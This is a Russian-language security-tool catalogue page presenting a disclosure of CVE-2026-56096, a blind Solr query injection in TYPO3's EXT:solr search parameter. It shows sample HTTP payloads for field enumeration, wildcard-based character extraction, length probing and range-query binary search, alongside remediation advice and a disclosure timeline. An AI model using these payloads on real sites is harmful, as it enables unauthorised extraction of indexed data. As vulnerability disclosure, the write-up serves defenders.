Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/yairhinkis/cve-2026-56096
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииВеб-безопасностьСтатьи и Исследования
GitHubyairhinkis/cve-2026-56096

CVE-2026-56096

Proof of concept и техническое описание CVE-2026-56096 — слепой инъекции запросов Solr в TYPO3 EXT:solr, позволяющей неаутентифицированное перечисление полей и извлечение данных.

Репозиторий
9 ч 56 мин назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-56096: Инъекция запросов Solr и слепое извлечение данных в TYPO3 EXT:solr

В официальном расширении TYPO3 Apache Solr (EXT:solr / apache-solr-for-typo3/solr) была обнаружена архитектурная уязвимость безопасности. Проблема позволяет неаутентифицированным удалённым злоумышленникам внедрять произвольный синтаксис запросов Solr/Lucene через параметр поиска tx_solr[q], что даёт возможность несанкционированного слепого перечисления полей и полного извлечения метаданных из поискового индекса.


Метаданные

  • CVE ID: CVE-2026-56096
  • Тип уязвимости: CWE-943: Improper Neutralization of Special Elements in Data Query Logic
  • Целевой компонент: EXT:solr (Параметр поиска: tx_solr[q])
  • Оценка CVSS v4.0: 6.3 (Средняя) — CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
  • Исследователь: Yair Hinkis

  • Обзор уязвимости

    Расширение EXT:solr принимает поисковые запросы, предоставленные пользователем, через параметр tx_solr[q] и передаёт их в движок Apache Solr. По замыслу расширение допускает использование определённых операторов запросов — таких как подстановочные знаки (*), односимвольные подстановочные знаки (?), селекторы полей (:) и диапазонные запросы ([a TO z]) — для поддержки легитимной функциональности, например фасетной фильтрации.

    Поскольку эти символы передавались непосредственно в конструкцию запроса бэкенда без применения белого списка или слоя абстракции запросов, злоумышленник может передать синтаксис, специфичный для полей, чтобы выйти за предполагаемые границы поиска. Это позволяет неаутентифицированным пользователям напрямую запрашивать внутренние поля Solr и извлекать данные индекса с использованием булевых слепых техник.


    Техники атаки

    1. Перечисление полей через field:*

    Добавив подстановочный знак к произвольному или предполагаемому имени поля, злоумышленник может проверить, существует ли это поле в схеме:

    root@kitploit:~
    GET /search?tx_solr[q]=siteHash:* HTTP/1.1
    Host: target.example.com
    
    

    Если поле существует, Solr обрабатывает запрос по всем совпадающим записям (часто вызывая различные коды ответа или поведение, связанное с объёмом), что позволяет автоматизировать перечисление полей на основе словарей.


    2. Слепое извлечение значений через префиксные подстановочные знаки

    Злоумышленники могут извлекать конфиденциальные значения полей посимвольно, используя булевы выводы:

    root@kitploit:~
    GET /search?tx_solr[q]=siteHash:a* HTTP/1.1  --> Возвращает результаты поиска (Значение начинается с 'a')
    GET /search?tx_solr[q]=siteHash:b* HTTP/1.1  --> "Nothing found" (Значение не начинается с 'b')
    
    

    3. Определение длины через оператор ?

    Оператор односимвольного подстановочного знака (?) позволяет определить точную длину хранимой строки перед началом посимвольного перебора:

    root@kitploit:~
    GET /search?tx_solr[q]=siteHash:????????????* HTTP/1.1   (Проверяет наличие 12+ символов)
    GET /search?tx_solr[q]=siteHash:?????????????* HTTP/1.1  (Проверяет наличие 13+ символов)
    
    

    4. Ускоренные диапазонные запросы ([a TO z])

    Диапазонные запросы позволяют выполнять извлечение методом бинарного поиска по первому символу, сокращая количество необходимых запросов с 26 до ~5 на каждую позицию символа:

    root@kitploit:~
    GET /search?tx_solr[q]=siteHash:[a TO m] HTTP/1.1  --> Определяет, попадает ли символ в диапазон 'a'-'m'
    GET /search?tx_solr[q]=siteHash:[n TO z] HTTP/1.1  --> Определяет, попадает ли символ в диапазон 'n'-'z'
    
    

    Комбинирование определения длины, диапазонных запросов и префиксных подстановочных знаков позволяет полностью извлечь поле при минимальном количестве запросов.


    Влияние

    • Нарушение конфиденциальности: Полное извлечение всех полей, проиндексированных в Apache Solr (например, внутренних системных хешей, скрытого содержимого страниц, метаданных, связанных с пользователями, и системных идентификаторов).
    • Обход контроля доступа: Обход фильтров поиска фронтенда и ограничений отображения TypoScript.
    • Область действия: Затронуты все установки по умолчанию, использующие конечную точку поиска EXT:solr.

    Устранение

    Глобальное экранирование символов недостаточно, поскольку такие операторы, как * и :, обслуживают предусмотренные функции поиска. Для устранения требуется модель белого списка и парсинга на уровне приложения:

    1. Разбирать предоставленные пользователем строки запросов в абстрактное синтаксическое дерево (AST) перед отправкой в движок Solr.
    2. Применять строгие белые списки к допустимым целевым полям, запрещая прямые пользовательские запросы к внутренним или ограниченным полям.
    3. Нейтрализовать злоупотребление операторами, не входящими в белый список, исходящее из недоверенных входных контекстов.

    Хронология скоординированного раскрытия

    • 6 марта 2026 г.: Уязвимость выявлена во время авторизованной оценки; первоначальное уведомление вендора.
    • 17 апреля 2026 г.: Вендор внедрил локальные пограничные меры защиты; подтверждён характер ошибки в upstream.
    • 8 мая 2026 г.: Официальный отчёт об уязвимости направлен в команду безопасности TYPO3 ([email protected]).
    • 15 июня 2026 г.: Команда безопасности TYPO3 подтвердила воспроизведение и начала разработку патча совместно с сопровождающими расширения.
    • 25 августа 2026 г.: Выпущен официальный бюллетень безопасности, опубликован патч и присвоен идентификатор CVE-2026-56096.

    Ссылки

    • Рекомендация по безопасности TYPO3: TYPO3-EXT-SA-2026-025
    • Определение CWE: CWE-943: Improper Neutralization of Special Elements in Data Query Logic
    Скачать инструмент